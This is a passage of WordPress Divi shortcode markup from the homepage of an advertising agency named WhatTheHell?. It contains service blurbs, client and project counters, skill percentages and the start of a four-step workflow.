market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, 